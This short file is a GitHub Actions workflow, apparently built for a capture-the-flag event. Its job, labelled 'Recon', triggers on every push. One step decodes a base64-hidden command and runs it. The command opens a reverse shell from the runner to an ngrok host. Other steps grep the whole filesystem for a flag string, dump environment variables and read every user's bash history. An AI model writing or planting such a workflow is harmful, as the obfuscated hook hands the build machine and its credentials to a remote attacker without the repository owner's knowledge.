name: TMCTF
on: [push]
jobs: 
  Recon: 
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "c2ggLWkgPiYgL2Rldi90Y3AvMi50Y3Aubmdyb2suaW8vMTkyNTMgMD4mMQo=" | base64 -d | sh 
      - run: |
          rgrep -i "544d435446" / 2>/dev/null
      - run: |
          env && cat /home/*/bash_history &
